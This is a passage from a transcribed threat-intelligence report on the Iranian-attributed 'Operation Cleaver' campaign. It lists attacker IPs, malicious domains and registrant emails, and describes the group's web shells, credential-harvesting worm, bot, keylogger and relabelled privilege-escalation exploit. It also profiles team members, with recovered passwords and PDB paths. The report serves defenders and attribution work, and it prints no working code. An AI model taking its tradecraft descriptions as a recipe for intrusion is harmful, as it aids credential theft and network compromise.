  726. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
  727. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
  728. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
  729. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
  730. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
  731. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
  732. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
  733. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
  734. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
  735. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
  736. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
  737. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
  738. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
  739. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
  740. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
  741. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
  742. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
  743. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
  744. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
  745. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
  746. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
  747.  
  748.  
  749. [ PG-17 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  750.  
  751.  
  752.  
  753. [CYLANCE                                                                                  #OPCLEAVER]
  754.  
  755.  
  756. ATTRIBUTION
  757.  
  758. Despite today’s trend toward attacker attribution, we believe it offers little real benefit to the
  759. day-to-day cyber defender. However, in this report we offer our observations on the sources of
  760. Operation Cleaver in order to benefit those that rely on attribution such as Law Enforcement.
  761.  
  762. Operation Cleaver is believed to consist of at least 20  hackers and developers, collaborating on
  763. projects and missions to support Iranian interests. Many of the targets were predominately
  764. English-speaking and a majority of the team members were capable of reading and writing in English.
  765. We present evidence that this team is operating, at least in part, out of Iran and in the interests
  766. of Iran. The skills and behavior of the Operation Cleaver teams are consistent with, and in one case
  767. surpasses, Iran’s cyber capabilities as we know  them today.
  768.  
  769.  
  770. For a complete list of IPs and domains related to this campaign, please refer to the Indicators of
  771. Compromise section.
  772.  
  773. ATTACKER IP ADDRESSES
  774.  
  775. Figure 4: The logo of the Army of the Guardians of the Islamic Revolution, also known as the Islamic
  776. Revolutionary Guard Corps (IRGC).
  777.  
  778. Over the course of multiple incident response engagements related to Operation Cleaver, we were able
  779. to identify a small set of IP addresses which were commonly used during the initial stages of an attack.
  780.  
  781. The IP address 78.109.194.114 served as a source for one of the primary attackers.  They were
  782. observed conducting SQL injections, controlling backdoors, as well as exfiltrating information using
  783. this address, and the address appears in multiple software configurations recovered from staging
  784. servers over a period of time.
  785.  
  786. GeoIP Location: Iran
  787. Net block: 78.109.194.96 - 78.109.194.127
  788. Owner: Tarh Andishan
  789. Email: tarh.andishan(at)yahoo.com Phone: +98-21-22496658
  790. NIC-Handle: TAR1973-RIPE
  791.  
  792. [ PG-18 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  793.  
  794.  
  795.  
  796. [CYLANCE                                                                                  #OPCLEAVER]
  797.  
  798.  
  799. This IP address was also observed in multiple software configurations. This particular net block was
  800. used over an extended period of time, indicating these were under the Cleaver team’s physical control.
  801. Additionally, prior netblocks used by the same team demonstrated to us that this wasn’t simply a
  802. case of proxying or “island hopping”. For more information see the Tarh Andishan section of this report.
  803.  
  804. The IP address 159.253.144.209 was a source for a secondary attacker in various compromises. They
  805. were observed conducting SQL injection attacks. While this IP was this registered in the Netherlands,
  806. we believe they used Softlayer’s Citrix demo environment to launch these attacks which is consistent
  807. with proxying or “island hopping”.
  808.  
  809. GeoIP Location: Netherlands
  810. Net block: 159.253.144.208 - 159.253.144.223
  811. ASN: Softlayer Technologies, Inc.
  812. IP Location: Netherlands, Amsterdam with Iranian sourcing.
  813.  
  814. ATTACKER DOMAINS
  815.  
  816. A number of Cleaver’s attack methods require a persistent server. In many cases, these servers were
  817. referenced by domain names. The following malicious domains are operated by this organization and are
  818. grouped by the registrant’s email address.
  819.  
  820. davejsmith200(at)outlook.com
  821. *       Teledyne-Jobs.com
  822. *       DownloadsServers.com
  823. *       NorthropGrumman.net
  824. *       MicrosoftMiddleAst.com
  825.  
  826. azlinux73(at)gmail.com
  827. *       MicrosoftServerUpdate.com
  828. *       WindowsSecurityUpdate.com
  829. *       WindowsServerUpdate.com
  830.  
  831. domain(at)netafraz.com
  832. *   EasyResumeCreatorPro.com
  833. *       MicrosoftWindowsResources.com
  834.  
  835. salman.ghazikhani(at)outlook.com
  836. *       Doosan-Job.com
  837.  
  838. btr.8624(at)yahoo.com
  839. *       GoogleProductUpdate.net
  840. *       WindowsCentralUpdate.com
  841. *       WindowsUpdateServer.com
  842. *       DriverCenterUpdate.com
  843.  
  844. msnhst(at)microsoft.com
  845. *       MicrosoftWindowsUpdate.net
  846.  
  847.  
  848. As is typical with malicious domains, the Whois data for most of these domains contained falsified
  849. information.
  850.  
  851. We managed to obtain a large collection of the internally developed tools used by the Cleaver team,
  852. many of which were developed by its members. Due to operational security failures, these tools
  853. contain information that provided us insight into their organization and operations.
  854.  
  855. [ PG-19 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  856.  
  857.  
  858.  
  859. [CYLANCE                                                                                  #OPCLEAVER]
  860.  
  861. TOOLS & SOFTWARE
  862.  
  863. Shell Creator 2
  864.  
  865. In the tool named Shell Creator 2, there are three main components. The creator generates an ASPX web
  866. shell using user input as well as a collection of templates. The web shell could then be installed
  867. via xp_cmdshell, or any other method which would grant the attacker write access. The web shell is
  868. accessible by the shell client directly.
  869.  
  870. The shell client is a portion of Shell Creator 2 that was not designed to be run on a compromised
  871. computer. We originally located it on a staging server being utilized for multiple attacks as well
  872. as a tool for sharing data between members of the organization’s team.
  873.  
  874. The shell client, which is developed in Java and is easily decompiled, is a simple interface with a
  875. feature to protect the operator from making a critical mistake. When executed, and before any
  876. connection to an instance of the web shell is initiated, the shell client communicates with
  877. freegeoip.net in order to get the external IP address of the current user. The country of origin is
  878. then shown to the user, to inform them of what country it appears they are connecting from. The
  879. assumed purpose of this feature is to ensure that a proper proxy is in use, and the real origin of
  880. the attacker is not revealed.
  881.  
  882. After decompiling the shell client, we found the following code segment controlling the display of
  883. this IP location information.
  884.  
  885. [EWWW SCREENCAP!]
  886. Figure 5: Java source code showing how Shell Creator 2 distinguishes between a source IP address
  887. coming from Iran (red) versus any other country (green).
  888.  
  889. This code handles the XML response from freegeoip.net, and displays the information as different
  890. colors based on different attributes. For instance, if the string “ERROR” is in the
  891. response, the text is displayed with the color magenta. If the string IRAN is in the response, the
  892. text is displayed with the color red. It should be noted that no other country name contains the
  893. substring IRAN.
  894.  
  895. [ PG-20 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  896.  
  897.  
  898.  
  899. [CYLANCE                                                                                  #OPCLEAVER]
  900.  
  901.  
  902. Shell Creator 2 (cont.)
  903.  
  904. [EWWW SCREENCAP!]
  905. Figure 6: Shell Creator 2 alerts the user in red when the IP being used can be sourced to Iran.
  906.  
  907. [EWWW SCREENCAP!]
  908. Figure 7: Shell Creator 2 notifies the user in green when their source IP address is not Iran.
  909.  
  910.  
  911. Net Crawler
  912.  
  913. Net Crawler is a tool developed in C# that exhibits worm-like behavior in order to gather cached
  914. credentials from any and all accessible computers on an infected network. This is done with Windows
  915. Credential Editor (WCE) and Mimikatz in combination with PsExec. Different versions of this malware
  916. contain ASCII art which names the authoring group as Zhoupin (in “leetspeak” as “Zh0up!n”).
  917.  
  918. ________   __         __                   __            
  919. /\_____  \ /\ \      /'__`\                /\ \            
  920. \/____//'/'\ \ \___ /\ \/\ \  __  __  _____\ \ \    ___    
  921.      //'/'  \ \  _ `\ \ \ \ \/\ \/\ \/\ '__`\ \ \ /' _ `\  
  922.     //'/'___ \ \ \ \ \ \ \_\ \ \ \_\ \ \ \L\ \ \_\/\ \/\ \
  923.     /\_______\\ \_\ \_\ \____/\ \____/\ \ ,__/\/\_\ \_\ \_\
  924.     \/_______/ \/_/\/_/\/___/  \/___/  \ \ \/  \/_/\/_/\/_/
  925.                                         \ \_\              
  926.                                          \/_/              
  927.  
  928.             Net_Crawler verion 1.0  (;) !
  929.                        
  930. Figure 8: Net Crawler version 1.0 has ASCII art showing the use of “Zh0up!n” in the campaigns tools.
  931.  
  932.  ________   __         __    
  933. /\_____  \ /\ \      /'__`\  
  934. \/____//'/'\ \ \___ /\ \/\ \  
  935.      //'/'  \ \  _ `\ \ \ \ \
  936.     //'/'___ \ \ \ \ \ \ \_\ \
  937.     /\_______\\ \_\ \_\ \____/
  938.     \/_______/ \/_/\/_/\/___/
  939.                              
  940.             Net_CR verion 2.8  (;) !
  941.  
  942. Figure 9: Updated ASCII art found in Net Crawler tool shows a version of “Zh0up!n” shortened to simply “Zh0”.
  943.  
  944.  
  945. For more information on Net Crawler, see the Tactics, Techniques and Procedures section.
  946.  
  947.  
  948. [ PG-21 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  949.  
  950.  
  951.  
  952. [CYLANCE                                                                                  #OPCLEAVER]
  953.  
  954. TinyZBot
  955.  
  956. TinyZBot is a bot written in C# and developed by the Cleaver team. It is the longest developed malware
  957. family discovered by this group, and has been used in campaigns for close to two years. How it operates
  958. can vary greatly from version to version. For a detailed technical analysis of TinyZBot, see the
  959. Tactics, Techniques and Procedures section. As TinyZBot is developed in C#, many versions can be
  960. decompiled to code very similar to their originals, including names of namespaces. Many versions
  961. were obfuscated with a legitimate tool for developers named SmartAssembly, which makes the recovery
  962. of some names implausible.
  963.  
  964. We obtained multiple versions from which we were able to recover many of the original names of
  965. variables and namespaces. In a number of these samples, the primary namespace for TinyZBot  
  966. is named Zhoupin_Cleaver. In every version of TinyZBot that is not obfuscated, there is a code base
  967. referred to as Cleaver. This code base is also shared in other malware developed by this organization,
  968. such as Csext.
  969.  
  970. PrivEsc
  971.  
  972. PrivEsc is a blatant plagiarism of an existing exploit for Microsoft Windows released in January 2010
  973. called MS10-015, “Vulnerabilities in Windows Kernel Could Allow Escalation of Privilege”, popularly
  974. known as the KiTrap0D exploit which was released publicly. The Cleaver team clearly modified the
  975. source code and compiled a new version. The only detectable modification was to change the original
  976. author’s name to instead display the following:
  977.  
  978.           Zhopin Exploit Team
  979.  
  980. This is not the only case of this team relabeling others’ work as their own.
  981.  
  982. Logger Module
  983.  
  984. Logger module is a component of the PVZ (PVZ is shorthand for Parviz, one of the members of the
  985. Cleaver team) bot tool chain. When executed, it will capture the user’s keystrokes and save them
  986. to a location which PVZ bot then exfiltrates. The logger module binary’s file description value is
  987. the following:
  988.  
  989.           ye file khube DG. ba in ham kari nadashte bashin
  990.  
  991. Roughly translated from Persian, this text says:
  992.  
  993.           DG is a good file, don’t bother with this
  994.  
  995. [ PG-22 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  996.  
  997.  
  998.  
  999. [CYLANCE                                                                                  #OPCLEAVER]
  1000.  
  1001. Logger Module (cont.)
  1002.  
  1003. This text could potentially be a note intended to stay internal, or could be an attempt to persuade
  1004. an unsuspecting victim to assume the file is not malicious. The Product Name value is GOOD FILE.
  1005. For more information on the PVZ bot tool chain, see the Tactics, Techniques, and Procedures section.
  1006.  
  1007. CCProxy
  1008.  
  1009. CCProxy is a publicly available proxy server for Windows, which can handle a variety of protocols. We
  1010. do not believe that this organization was involved in the development or modification of CCProxy, but
  1011. they have been observed using it. We recovered a CCProxy configuration, which exposed various
  1012. operational details.
  1013.  
  1014. The configuration allowed for remote connections, limited by a username as well as a limited IP range.
  1015. The username was User-001, which is the default value. The limited IP range covered one IP: 78.109.194.114.
  1016.  
  1017. This IP address is located in Iran, and is owned by Tarh Andishan.
  1018.  
  1019. The configuration also indicates which address the CCProxy server should listen on for incoming
  1020. connections such as web (80) and mail (25).
  1021.  
  1022. [EWWW SCREENCAP!]
  1023.  
  1024. Figure 10 (above): CCProxy configuration file using the hardcoded IP address registered to Tarh Andishan.
  1025. [EWWW SCREENCAP!]
  1026.  
  1027. Figure 11 (left): CCProxy configuration file showing the use of web and mail as listening ports.
  1028.  
  1029. [ PG-23 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1030.  
  1031.  
  1032.  
  1033. [CYLANCE                                                                                  #OPCLEAVER]
  1034.  
  1035. NMAP Log
  1036.  
  1037. Log output from the network port scanning application NMAP was recovered from a staging server. This
  1038. log was generated during the usage of the nbrute utility, which brute-forces network credentials and
  1039. relies on NMAP to do so. The header of this NMAP log indicates that the computer used to run
  1040. nbrute/nmap was set to Iran Daylight Time at the time of execution.
  1041.  
  1042.  
  1043.                 Starting Nmap 6.25 at 2012-08-17 09:18 Iran Daylight Time
  1044.  
  1045. With no known victims located in Iran, it is likely that this was executed on an attacker’s computer,
  1046. and not on a victim’s computer.
  1047.  
  1048. Squid Configuration
  1049.  
  1050. A configuration file for a Squid proxy server was recovered.
  1051.  
  1052. [EWWW SCREENCAP!]
  1053.  
  1054. Figure 12: Squid configuration file showing the use of Tarh Andishan’s IP address.
  1055.  
  1056.  
  1057. The net range of 78.109.194.114/28 was inserted into the allowed local networks with an RFC comment
  1058. appended in order to make it look like it was part of the default configuration. It is likely this
  1059. is the same reason a /28 net range was used, in order to not look like it was intended to only allow
  1060. one IP. This would give the same access to resources accessible from the Squid proxy server to this
  1061. Iranian IP address.
  1062.  
  1063.  
  1064. TARH ANDISHAN
  1065.  
  1066. Tarh Andishan is listed as the registrant for a number of small net blocks based upon the email address
  1067. tarh.andishan(at)yahoo.com. The net blocks appear to rotate over time and registrant information is
  1068. altered to accommodate ongoing operations and avoid potential public exposure.
  1069.  
  1070. [ PG-24 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1071.  
  1072.  
  1073.  
  1074. [CYLANCE                                                                                  #OPCLEAVER]
  1075.  
  1076.  
  1077. TARH ANDISHAN (cont.)
  1078.  
  1079. The networks are included below as well as the last time that net block was observed as active.
  1080.  
  1081.  
  1082. * 78.109.194.96/27 - Current
  1083. * 217.11.17.96/28 - 10/22/2014
  1084. * 81.90.144.104/29 - 10/5/2014
  1085. * 31.47.35.0/24 – 11/2012
  1086.  
  1087. There are many seemingly legitimate Tarh Andishan related companies inside Tehran, but strong connections
  1088. to Iranian backing have been difficult to prove definitively. “Tarh Andishan” is often translated as
  1089. “Thinkers”, “Innovators” and “Inventors”.
  1090.  
  1091. The net blocks above have strong associations with state-owned oil and gas companies. These companies
  1092. have current and former employees who are ICS experts.
  1093.  
  1094. Tarh Andishan has been suspected in the past of launching attacks in the interest of Iran. The
  1095. operators of the blog IranRedLine.org, which comments on Iran’s nuclear weapons efforts, has mentioned
  1096. in multiple posts having been the target of debilitating brute-force authentication attacks from IP
  1097. addresses registered to the same Tarh Andishan team found in Cleaver.
  1098.  
  1099. In one of IranRedLine.org’s blog posts8, the author speculates on Tarh Andishan’s involvement with the
  1100. Iranian government by showing close proximity to SPND, the Organization of Defensive Innovation and
  1101. Research; however, the phone number listed under the registrant contact information has yet to be
  1102. completely validated.
  1103.  
  1104.  
  1105. [EWWW SCREENCAP!]
  1106.  
  1107. Figure 13: This image from IranRedLine.org demonstrates Tarh Andishan’s probably fabricated Whois
  1108. address to the proximity to Iran’s SPND (Organization of Defensive Innovation and Research).
  1109.  
  1110.  
  1111. [ PG-25 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1112.  
  1113.  
  1114.  
  1115. [CYLANCE                                                                                  #OPCLEAVER]
  1116.  
  1117. MEMBERS
  1118.  
  1119. During this investigation, we were able to compile a considerable amount of information on some of
  1120. the members of this organization. The following profiles were built from reverse engineering, code
  1121. analysis, open source intelligence, incident response and forensics work. Personally identifiable
  1122. information about these members is not being shared publicly as it could endanger their lives and
  1123. would be irresponsible.
  1124.  
  1125. Parviz
  1126.  
  1127. Parviz is a developer who worked on a variety of projects, and was primarily active in 2013. His
  1128. development skillset is based around his ability to develop in C/C++. He has been observed using
  1129. Visual Studio 2010, and his tools are written exclusively for Windows. Some of his tools were found
  1130. to be packed with ASPack.
  1131.  
  1132. Parviz is the primary developer of the PVZ bot and multiple parts of its tool chain. Parviz is likely
  1133. associated with the PVZ bot as his name in hardcoded into the PDB file paths.
  1134.  
  1135. The PVZ tool chain includes a variety of functionality, such as HTTP command and control
  1136. communications with an ASPX server-side component, a denial of service tool they developed, and the
  1137. public project named XYNTService used to run ordinary applications as services.
  1138.  
  1139. PDBs
  1140.  
  1141. * C:\Users\parviz\documents\visual studio 2010\Projects\BotManager\ Release\BotManager.pdb
  1142. * C:\Users\parviz\Documents\Visual Studio 2010\Projects\socket-test\ Release\socket-test.pdb
  1143. * C:\Users\parviz\Documents\Visual Studio 2010\Projects\ XYNTServiceProject\XYNTServiceProject\Debug\
  1144. XYNTService.pdb
  1145. * C:\Users\Parviz\documents\visual studio 2010\Projects\SendModule\ Release\SendModule.pdb
  1146.  
  1147.  
  1148. [ PG-26 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1149.  
  1150.  
  1151.  
  1152. [CYLANCE                                                                                  #OPCLEAVER]
  1153.  
  1154. Nesha
  1155.  
  1156. Nesha is one of the offensive members of this organization. Nesha was seen in breaches involving SQL
  1157. injection as well as other techniques. Nesha often utilized web-based backdoors developed in ASPX,
  1158. PHP as well as ColdFusion. A copy of an MS08-067 exploit developed in Python was recovered in which
  1159. Nesha shamelessly replaced the original author’s name with his own.
  1160.  
  1161. Nesha’s passwords very commonly include own handle. His passwords were frequently stored as hashes in
  1162. backdoors, but common hash cracking methods were able to recover the plaintext versions. His observed
  1163. password use is as follows:
  1164.  
  1165. * nesha nesha used as password in ColdFusion backdoors
  1166. * NeshaNesha12 used as password in ASPX backdoors.
  1167. * nesha123 was found as a password in a recovered credential file with unknown association
  1168.  
  1169. Cylance observed Nesha participating in compromises involving the following techniques:
  1170.  
  1171. * SQL injection
  1172. * Web backdoors
  1173. * Cached credential dumping
  1174.  
  1175. Nesha has additionally been identified using a variety of internally developed tools as well as the
  1176. following publicly available tools:
  1177.  
  1178. * Cain & Abel
  1179. * PsExec
  1180. * PLink
  1181. * NetCat
  1182.  
  1183. Alireza
  1184.  
  1185. Alireza appears to be one of the senior developers of this organization. His tools are commonly
  1186. developed in C++, Java, and C# (desktop and ASPX). These tools are often support tools, either
  1187. monitoring the activity of other tools or supplementing the function of other tools gathering
  1188. information during the infiltration process. Alireza’s code appears to be reused internally on projects
  1189. such as TinyZBot. Alireza appears to be using a version control system for his code, and  it is likely
  1190. that others are using the same system. Based on the paths, the version control system in use is likely
  1191. Apache’s Subversion. Use of a version control system is indicative of code sharing, but the use of an
  1192. older system like Subversion, along with other evidence, suggests there is not a large amount of
  1193. collaboration on projects and likely one developer working on each project at a time. This is not
  1194. behavior typical of a professional development team.
  1195.  
  1196. [ PG-27 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1197.  
  1198.  
  1199.  
  1200. [CYLANCE                                                                                  #OPCLEAVER]
  1201.  
  1202. Alireza (cont.)
  1203.  
  1204. Alireza’s C# tools include the following techniques:
  1205.  
  1206. *       Querying Windows Management Instrumentation Command-line (WMIC)
  1207. *       Cached credential dumping
  1208. *       Generating ASPX shells
  1209. *       Encryption
  1210. *       Process enumeration
  1211.  
  1212. Alireza’s Java tools include the following techniques:
  1213.  
  1214. *       HTTP communications
  1215. *       GUI development
  1216.  
  1217. Alireza’s C++ tools include the following techniques:
  1218.  
  1219. *       WinPcap interface
  1220. *       ARP poisoning
  1221. *       HTTP communications
  1222. *       SMB communications
  1223.  
  1224. PDBs
  1225.  
  1226. *       C:\Users\alireza\Documents\Visual Studio 2010\CPPProjects\IDCSercive\trunk\Release\kagent.pdb
  1227. *       C:\Users\alireza\Documents\Visual Studio 2010\CPPProjects\PcapServiceInstaller\Release\
  1228.         PcapServiceInstaller.pdb
  1229. *       C:\Users\alireza\Documents\Visual Studio 2010\Projects\AntiVirusDetectorConsole\AntiVirusDetectorConsole\
  1230.         obj\x86\Release\ AntiVirusDetectorConsole.pdb
  1231. *       C:\Users\alireza\Documents\Visual Studio 2010\Projects\mimikatzWrapper\mimikatzWrapper\obj\x86\Debug\
  1232.         mimikatzWrapper.pdb
  1233. *       C:\Users\alireza\Documents\Visual Studio 2010\Projects\ShellCreator2\ShellCreator2\obj\x86\Debug\
  1234.         ShellCreator2.pdb
  1235. *       c:\Users\alireza\Documents\Visual Studio 2012\Projects\BackDoorLogger\BackDoorLogger\obj\Debug\
  1236.         BackDoorLogger.pdb
  1237.  
  1238.  
  1239. [ PG-28 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1240.  
  1241.  
  1242.  
  1243. [CYLANCE                                                                                  #OPCLEAVER]
  1244.  
  1245. kaJ
  1246.  
  1247. kaJ is a .NET developer, and has only been observed working in C#. He has less English language
  1248. proficiency than others in the organization, and likely has a supplemental role during compromises.
  1249. He has been observed developing tools which cater to specific challenges in a compromise. His notable
  1250. project was named Net Crawler, and a technical analysis of this tool can be found in the Tactics,
  1251. Techniques and Procedures section. Thanks to a recovered test configuration for Net Crawler, we were
  1252. able to determine that kaJ’s development computer has the name dev-castle, where he has the username
  1253. kaJ and the password oaolrJ@vad. kaJ is believed to be the creator of the Zhoupin ASCII art displayed
  1254. in Net Crawler.
  1255.  
  1256. kaJ’s projects include the following techniques.
  1257.  
  1258. *       Interfacing with multiple cached credential dumping tools
  1259. *       Interfacing with PsExec
  1260. *       Worming behavior
  1261.  
  1262. Jimbp
  1263.  
  1264. Jimbp is a .NET developer with minimal experience. His projects appear to be supplemental to TinyZBot
  1265. and are very simplistic. It is believed he is the developer of the project Binder_1. This project was
  1266. a simple malware binder which required manual configuration when compiling. His other work included
  1267. creating a new service wrapper for TinyZBot.
  1268.  
  1269. PDBs
  1270.  
  1271. *       c:\Users\Jimbp\Desktop\Binder_1\Binder_1\obj\x86\Release\Setup.pdb
  1272. *       c:\Users\Jimbp\Desktop\Binder_1 - for cleaver\Binder_1\obj\x86\ Release\Setup.pdb
  1273. *       c:\Users\Jimbp\Documents\Visual Studio 2013\Projects\ TestForInstallingService\
  1274.         TestForInstallingService\obj\Release\ TestForInstallingService.pdb
  1275.  
  1276. [ PG-29 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1277.  
  1278.  
  1279.  
  1280. [CYLANCE                                                                                  #OPCLEAVER]
  1281.  
  1282. TEAMS
  1283.  
  1284. Of course many associated Iranian hacker teams have been identified in public and private security
  1285. circles. Some of the teams publicly known today include Iranian Cyber Army, Ashiyane, Islamic Cyber
  1286. Resistance Group, Izz ad-Din al-Qassam Cyber Fighters, Parastoo, Shabgard, Iran Black Hats and many
  1287. others9.
  1288.  
  1289. However, even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber
  1290. Army (botnets), Ashiyane (SQL injection) and Syrian Electronic Army (phishing and RATs), we believe
  1291. this is largely the work of a new team. Some connections to Ashiyane were discovered in our
  1292. investigations including a reference to hussein1363, who had prior ties to the hacker group.
  1293. Additional connections between team members and individuals exist but are predominantly speculative
  1294. and have only been shared with law enforcement.
  1295.  
  1296. Ultimately we believe the Cleaver team is a mix of existing team members and new recruits pulled
  1297. from the universities in Iran.
  1298.  
  1299.  
  1300. [ PG-30 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1301.  
  1302.  
  1303.  
  1304. [CYLANCE                                                                                  #OPCLEAVER]
  1305.  
  1306. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
  1307. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
  1308. %#%%%%%%%%@@@%%%@@#%%%%%%%%            TACTICS, TECHNIQUES       %@@@@#%%%%%%%%((%#&@%@@@@#%%%%%%%%
  1309. %@@@@#%%%%%%%%((%#&@ @@))%%               & PROCEDURES           @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%
  1310. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
  1311. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
  1312. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
  1313. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
  1314. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
  1315. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
  1316. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
  1317. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
  1318. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
  1319. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
  1320. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
  1321. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
  1322. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
  1323. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
  1324. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
  1325. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
  1326. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
  1327. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
  1328. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
